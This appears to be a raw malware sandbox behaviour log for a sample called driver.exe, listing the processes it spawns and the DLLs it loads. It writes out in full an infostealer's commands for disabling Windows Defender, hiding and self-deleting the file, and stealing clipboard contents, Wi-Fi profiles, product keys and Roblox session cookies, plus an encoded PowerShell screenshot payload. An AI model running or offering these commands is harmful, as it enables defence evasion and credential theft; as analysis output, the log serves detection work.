Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Users\user\Desktop\driver.exe "C:\Users\user\Desktop\driver.exe"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\driver.exe""	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('error 0x1233112x', 0, 'invalid key', 32+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\driver.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5CD.tmp" "c:\Users\user\AppData\Local\Temp\c4gv4hox\CSCF22C8917EB0C431F96BD8AEEEA495758.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Users\user\Desktop\driver.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
